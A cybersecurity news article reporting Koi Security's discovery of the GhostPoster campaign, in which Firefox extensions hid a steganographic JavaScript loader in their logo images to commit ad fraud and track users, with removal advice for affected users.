Hidden in Plain Sight: How the GhostPoster Campaign Injected Malware Into 50,000 Firefox Users

Researchers at Koi Security have identified a new malicious campaign dubbed GhostPoster, targeting users of the Firefox browser. As part of the operation, attackers distributed extensions that appeared harmless and even amassed tens of thousands of installations, yet concealed a latent threat. The campaign’s most unusual feature lies in its method of concealment: the malicious code was embedded directly within the graphical logo files of the add-ons.

At least seventeen extensions were involved. In every case, the PNG logo served as a container for JavaScript code injected through steganography. This code functioned as a loader, granting persistent, elevated access to the browser. Once activated, it enabled the hijacking of affiliate links, the injection of third-party analytics, and participation in advertising abuse and click fraud schemes.

To evade detection, the loader remained dormant most of the time, contacting a remote server in only one out of ten executions. It also delayed activation until forty-eight hours after installation. The primary payload was fetched from a predefined domain, with a fallback address used in case of failure. The retrieved code underwent multiple layers of processing—obfuscation, Base64 decoding, and additional encryption using a key tied to the extension’s identifier.

Although the delivery chains varied, all identified extensions exhibited similar behavior and communicated with the same command-and-control infrastructure. Compromised add-ons spanned several popular categories, including VPN services, translation tools, weather widgets, and utilities for working with web pages.

The final malicious module did not steal passwords or redirect users to phishing sites, but it significantly eroded privacy. It injected hidden advertising frames, stripped protective HTTP headers, bypassed CAPTCHA mechanisms, and added tracking of visited pages.

According to Koi Security, the delivery mechanism employed by GhostPoster makes the campaign particularly dangerous, as operators could at any moment swap the payload for something far more destructive. Users who installed the affected extensions are advised to remove them immediately and change passwords for critical accounts.

At the time of publication, several of the malicious add-ons remained available in the Firefox Add-ons catalog. Mozilla was notified of the issue, but the company had not issued a prompt public response.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy